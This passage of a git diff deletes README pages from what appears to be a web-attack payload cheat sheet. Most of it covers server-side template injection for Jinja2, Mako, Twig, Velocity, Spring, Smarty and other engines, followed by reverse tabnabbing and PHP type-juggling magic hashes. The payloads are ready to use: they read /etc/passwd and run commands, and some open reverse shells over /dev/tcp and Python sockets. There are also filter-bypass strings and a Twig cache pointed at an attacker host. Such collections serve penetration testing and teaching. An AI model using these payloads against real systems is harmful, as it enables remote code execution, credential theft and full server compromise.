-${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} -``` - ---- - -## Django Templates - -Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. - -### Detection - - -```python -{% csrf_token %} # Causes error with Jinja2 -{{ 7*7 }} # Error with Django Templates -ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r -``` - -### Django Templates for post-exploitation - -```python -# Variables -{{ variable }} -{{ variable.attr }} - -# Filters -{{ value|length }} - -# Tags -{% csrf_token %} -``` - -### Cross-site scripting - -```python -{{ '' }} -{{ '' | safe }} -``` - -### Debug information leak - -```python -{% debug %} -``` - -### Leaking app’s Secret Key - -```python -{{ messages.storages.0.signer.key }} -``` - -### Admin Site URL leak - - -``` -{% include 'admin/base.html' %} -``` - -### Admin username and password hash leak - - -``` -{% load log %}{% get_admin_log 10 as log %}{% for e in log %} -{{e.user.get_username}} : {{e.user.password}}{% endfor %} -``` - -## Jinja2 - -[Official website](https://jinja.palletsprojects.com/) -> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. - -### Jinja2 - Basic injection - -```python -{{4*4}}[[5*5]] -{{7*'7'}} would result in 7777777 -{{config.items()}} -``` - -Jinja2 is used by Python Web Frameworks such as Django or Flask. -The above injections have been tested on a Flask application. - -### Jinja2 - Template format - -```python -{% extends "layout.html" %} -{% block body %} - -{% endblock %} - -``` - -### Jinja2 - Debug Statement - -If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump the current context as well as the available filters and tests. This is useful to see what’s available to use in the template without setting up a debugger. - -```python -
{% debug %}
-``` - -Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement - -### Jinja2 - Dump all used classes - -```python -{{ [].class.base.subclasses() }} -{{''.class.mro()[1].subclasses()}} -{{ ''.__class__.__mro__[2].__subclasses__() }} -``` - -Access `__globals__` and `__builtins__`: - -```python -{{ self.__init__.__globals__.__builtins__ }} -``` - -### Jinja2 - Dump all config variables - -```python -{% for key, value in config.iteritems() %} -
{{ key|e }}
-
{{ value|e }}
-{% endfor %} -``` - -### Jinja2 - Read remote file - -```python -# ''.__class__.__mro__[2].__subclasses__()[40] = File class -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} -{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }} -# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398 -{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} -``` - -### Jinja2 - Write into remote file - -```python -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} -``` - -### Jinja2 - Remote Code Execution - -Listen for connection - -```bash -nc -lnvp 8000 -``` - -#### Jinja2 - Forcing output on blind RCE - -You can import Flask functions to return an output from the vulnerable page. - -```py -{{ -x.__init__.__builtins__.exec("from flask import current_app, after_this_request -@after_this_request -def hook(*args, **kwargs): - from flask import make_response - r = make_response('Powned') - return r -") -}} -``` - - -#### Exploit the SSTI by calling os.popen().read() - -```python -{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} -``` - -But when `__builtins__` is filtered, the following payloads are context-free, and do not require anything, except being in a jinja2 Template object: - -```python -{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} -{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} -{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} -``` - -We can use these shorter payloads (this is the shorter payloads known yet): - -```python -{{ cycler.__init__.__globals__.os.popen('id').read() }} -{{ joiner.__init__.__globals__.os.popen('id').read() }} -{{ namespace.__init__.__globals__.os.popen('id').read() }} -``` - -Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ - -#### Exploit the SSTI by calling subprocess.Popen - -:warning: the number 396 will vary depending of the application. - -```python -{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} -{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} -``` - -#### Exploit the SSTI by calling Popen without guessing the offset - -```python -{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} -``` - -Simply modification of payload to clean up output and facilitate command input (https://twitter.com/SecGus/status/1198976764351066113) -In another GET parameter include a variable named "input" that contains the command you want to run (For example: &input=ls) - -```python -{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} -``` - -#### Exploit the SSTI by writing an evil config file. - -```python -# evil config -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} - -# load the evil config -{{ config.from_pyfile('/tmp/evilconfig.cfg') }} - -# connect to evil host -{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} -``` - -### Jinja2 - Filter bypass - -```python -request.__class__ -request["__class__"] -``` - -Bypassing `_` - -```python -http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_ - -{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} -{{request|attr(["_"*2,"class","_"*2]|join)}} -{{request|attr(["__","class","__"]|join)}} -{{request|attr("__class__")}} -{{request.__class__}} -``` - -Bypassing `[` and `]` - -```python -http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_ -or -http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ -``` - -Bypassing `|join` - -```python -http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ -``` - -Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: -```python -{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} -``` - ---- - -## Jinjava - -[Official website](https://github.com/HubSpot/jinjava) -> Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content). - -### Jinjava - Basic injection - -```python -{{'a'.toUpperCase()}} would result in 'A' -{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206 -``` - -Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) - -### Jinjava - Command execution - -Fixed by https://github.com/HubSpot/jinjava/pull/230 - -```python -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} - -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} - -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} - -{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} -``` - ---- - -## Lessjs - -[Official website](https://lesscss.org/) -> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles. - -### Lessjs - SSRF / LFI - -```less -@import (inline) "http://localhost"; -// or -@import (inline) "/etc/passwd"; -``` - -### Lessjs < v3 - Command Execution - -```less -body { - color: `global.process.mainModule.require("child_process").execSync("id")`; -} -``` - -### Plugins - -Lessjs plugins can be remotely included and are composed of Javascript which gets executed when the Less is transpiled. - -```less -// example local plugin usage -@plugin "plugin-2.7.js"; -``` -or -```less -// example remote plugin usage -@plugin "http://example.com/plugin-2.7.js" -``` - -version 2 example RCE plugin: - -```javascript -functions.add('cmd', function(val) { - return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`; -}); -``` -version 3 and above example RCE plugin - -```javascript -//Vulnerable plugin (3.13.1) -registerPlugin({ - install: function(less, pluginManager, functions) { - functions.add('cmd', function(val) { - return global.process.mainModule.require('child_process').execSync(val.value).toString(); - }); - } -}) -``` - ---- - -## Mako - -[Official website](https://www.makotemplates.org/) -> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. - -```python -<% -import os -x=os.popen('id').read() -%> -${x} -``` - -### Direct access to os from TemplateNamespace: - -Any of these payloads allows direct access to the `os` module - -```python -${self.module.cache.util.os.system("id")} -${self.module.runtime.util.os.system("id")} -${self.template.module.cache.util.os.system("id")} -${self.module.cache.compat.inspect.os.system("id")} -${self.__init__.__globals__['util'].os.system('id')} -${self.template.module.runtime.util.os.system("id")} -${self.module.filters.compat.inspect.os.system("id")} -${self.module.runtime.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.util.os.system("id")} -${self.template.__init__.__globals__['os'].system('id')} -${self.module.cache.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.util.os.system("id")} -${self.template.module.cache.compat.inspect.os.system("id")} -${self.module.cache.compat.inspect.linecache.os.system("id")} -${self.template._mmarker.module.runtime.util.os.system("id")} -${self.attr._NSAttr__parent.module.cache.util.os.system("id")} -${self.template.module.filters.compat.inspect.os.system("id")} -${self.template.module.runtime.compat.inspect.os.system("id")} -${self.module.filters.compat.inspect.linecache.os.system("id")} -${self.module.runtime.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.exceptions.util.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} -${self.context._with_template.module.cache.util.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.template.module.cache.util.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.util.os.system("id")} -${self.module.cache.util.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.linecache.os.system("id")} -${self.module.runtime.exceptions.traceback.linecache.os.system("id")} -${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.compat.inspect.os.system("id")} -${self.template.module.cache.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} -${self.template._mmarker.module.filters.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} -${self.template.module.filters.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} -${self.context._with_template._mmarker.module.cache.util.os.system("id")} -${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.cache.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} -${self.context._with_template._mmarker.module.runtime.util.os.system("id")} -${self.context._with_template.module.filters.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.exceptions.util.os.system("id")} -${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} -``` - -PoC : - -```python ->>> print(Template("${self.module.cache.util.os}").render()) - -``` - -Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - - ---- - -## Pebble - -[Official website](https://pebbletemplates.io/) -> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. - -### Pebble - Basic injection - -```java -{{ someString.toUPPERCASE() }} -``` - -### Pebble - Code execution - -Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. - -New version of Pebble : - -```java -{% set cmd = 'id' %} -{% set bytes = (1).TYPE - .forName('java.lang.Runtime') - .methods[6] - .invoke(null,null) - .exec(cmd) - .inputStream - .readAllBytes() %} -{{ (1).TYPE - .forName('java.lang.String') - .constructors[0] - .newInstance(([bytes]).toArray()) }} -``` - ---- - -## Ruby - -### Ruby - Basic injections - -ERB: - -```ruby -<%= 7 * 7 %> -``` - -Slim: - -```ruby -#{ 7 * 7 } -``` - -### Ruby - Retrieve /etc/passwd - -```ruby -<%= File.open('/etc/passwd').read %> -``` - -### Ruby - List files and directories - -```ruby -<%= Dir.entries('/') %> -``` - -### Ruby - Code execution - -Execute code using SSTI for ERB engine. - -```ruby -<%= system('cat /etc/passwd') %> -<%= `ls /` %> -<%= IO.popen('ls /').readlines() %> -<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> -<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> -``` - -Execute code using SSTI for Slim engine. - -```powershell -#{ %x|env| } -``` - ---- - -## Smarty - -[Official website](https://www.smarty.net/docs/en/) -> Smarty is a template engine for PHP. - -```python -{$smarty.version} -{php}echo `id`;{/php} //deprecated in smarty v3 -{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} -{system('ls')} // compatible v3 -{system('cat index.php')} // compatible v3 -``` - ---- - -## Twig - -[Official website](https://twig.symfony.com/) -> Twig is a modern template engine for PHP. - -### Twig - Basic injection - -```python -{{7*7}} -{{7*'7'}} would result in 49 -{{dump(app)}} -{{dump(_context)}} -{{app.request.server.all|join(',')}} -``` - -### Twig - Template format - -```python -$output = $twig > render ( - 'Dear' . $_GET['custom_greeting'], - array("first_name" => $user.first_name) -); - -$output = $twig > render ( - "Dear {first_name}", - array("first_name" => $user.first_name) -); -``` - -### Twig - Arbitrary File Reading - -```python -"{{'/etc/passwd'|file_excerpt(1,30)}}"@ -{{include("wp-config.php")}} -``` - -### Twig - Code execution - -```python -{{self}} -{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} -{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} -{{['id']|filter('system')}} -{{[0]|reduce('system','id')}} -{{['id']|map('system')|join}} -{{['id',1]|sort('system')|join}} -{{['cat\x20/etc/passwd']|filter('system')}} -{{['cat$IFS/etc/passwd']|filter('system')}} -``` - -Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) - -```python -FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }} -``` - -Example with an email passing FILTER_VALIDATE_EMAIL PHP. - -```powershell -POST /subscribe?0=cat+/etc/passwd HTTP/1.1 -email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld -``` - ---- - -## Java - Velocity - -[Official website](https://velocity.apache.org/engine/1.7/user-guide.html) -> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. - -```python -#set($str=$class.inspect("java.lang.String").type) -#set($chr=$class.inspect("java.lang.Character").type) -#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) -$ex.waitFor() -#set($out=$ex.getInputStream()) -#foreach($i in [1..$out.available()]) -$str.valueOf($chr.toChars($out.read())) -#end -``` - ---- - - -## Java - Spring - -```python -*{7*7} -*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} -``` - ---- - -## patTemplate - -> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts - -```xml - - This is the main page. - - It contains another template. - - - Hello {NAME}.
-
-
-``` - ---- - -## PHPlib and HTML_Template_PHPLIB - -[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) is the same as PHPlib but ported to Pear. - -`authors.tpl` - -```html - - {PAGE_TITLE} - - - - - - - - - - - - - - -
Authors
NameEmail
{NUM_AUTHORS}
{AUTHOR_NAME}{AUTHOR_EMAIL}
- - -``` - -`authors.php` - -```php - 'cweiske@php.net', - 'Bjoern Schotte' => 'schotte@mayflower.de' -); - -require_once 'HTML/Template/PHPLIB.php'; -//create template object -$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep'); -//load file -$t->setFile('authors', 'authors.tpl'); -//set block -$t->setBlock('authors', 'authorline', 'authorline_ref'); - -//set some variables -$t->setVar('NUM_AUTHORS', count($authors)); -$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d')); - -//display the authors -foreach ($authors as $name => $email) { - $t->setVar('AUTHOR_NAME', $name); - $t->setVar('AUTHOR_EMAIL', $email); - $t->parse('authorline_ref', 'authorline', true); -} - -//finish and echo -echo $t->finish($t->parse('OUT', 'authors')); -?> -``` - ---- - -## Plates - -Plates is inspired by Twig but a native PHP template engine instead of a compiled template engine. - -controller: - -```php -// Create new Plates instance -$templates = new League\Plates\Engine('/path/to/templates'); - -// Render a template -echo $templates->render('profile', ['name' => 'Jonathan']); -``` - -page template: - -```php -layout('template', ['title' => 'User Profile']) ?> - -

User Profile

-

Hello, e($name)?>

-``` - -layout template: - -```php - - - <?=$this->e($title)?> - - - section('content')?> - - -``` - ---- - -## References - -* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) -* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) -* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) -* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) -* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) -* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) -* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) -* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) -* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) -* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) -* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) -* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) -* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) -* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) -* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) -* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) -* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) -* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) -* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) -* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) -* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw) -* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) -* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) -* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) diff --git a/Tabnabbing/README.md b/Tabnabbing/README.md deleted file mode 100644 index 5b5ce72..0000000 --- a/Tabnabbing/README.md +++ /dev/null @@ -1,43 +0,0 @@ -# Tabnabbing - -> Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one. - -## Summary - -* [Tools](#tools) -* [More information about the vulnerability](#More-information-about-the-vulnerability) -* [How to exploit](#How-to-exploit) -* [How to hunt for it](#How-to-hunt-for-it) -* [References](#references) - -## Tools - -- [Discover Reverse Tabnabbing - Burp Extension](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - -## More information about the vulnerability - -When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. - -## How to exploit -``` -1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" -2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. -3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. -4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example. -5. The victim tries to log on again and the attacker receives the credentials -``` - -## How to hunt for it - -As already mentioned, you have to search for the following link formats: - -```html - -or - -``` - -## References - -- [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) -- [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing) diff --git a/Type Juggling/README.md b/Type Juggling/README.md deleted file mode 100644 index 37ebd0a..0000000 --- a/Type Juggling/README.md +++ /dev/null @@ -1,112 +0,0 @@ -# PHP Juggling type and magic hashes - -PHP provides two ways to compare two variables: - -- Loose comparison using `== or !=` : both variables have "the same value". -- Strict comparison using `=== or !==` : both variables have "the same type and the same value". - -PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs. - -> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead. - -## Type Juggling - -### True statements - -```php -var_dump('0010e2' == '1e3'); # true -var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 -var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 -var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0 -var_dump('0x1234Ab' == '1193131'); -``` - -```php -'123' == 123 -'123a' == 123 -'abc' == 0 -``` - -```php -'' == 0 == false == NULL -'' == 0 # true -0 == false # true -false == NULL # true -NULL == '' # true -``` - -### NULL statements - -```php -var_dump(sha1([])); # NULL -var_dump(md5([])); # NULL -``` - -### Example vulnerable code - -```php -function validate_cookie($cookie,$key){ - $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['$expiration'], $key); - if($cookie['hmac'] != $hash){ // loose comparison - return false; - ... -``` - -The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user. - -If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass. - -```ps1 -"0e768261251903820937390661668547" == "0" -``` - -We have control over 3 elements in the cookie: -- `$username` - username you are targeting, probably "admin" -- `$hmac` - the provided hash, "0" -- `$expiration` - a UNIX timestamp, must be in the future - -Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. - -```ps1 -hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" -hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" -hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" -hash_hmac(admin|1424869666) -> "105c0abe89825a14c471d4f0c1cc20ab" -... -hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e174892301580325162390102935332" == "0" -``` - -## Magic Hashes - Exploit - -If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. - -| Hash | "Magic" Number / String | Magic Hash | Found By / Description | -| ---- | -------------------------- |:---------------------------------------------:| -------------:| -| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | -| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | -| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | -| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | -| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | -| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | -| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) - -```php - -``` - -## References - -* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) -* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) -* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) -* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) -* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html) \ No newline at end of file diff --git a/Upload Insecure Files/CVE Ffmpeg HLS/README.md b/Upload Insecure Files/CVE 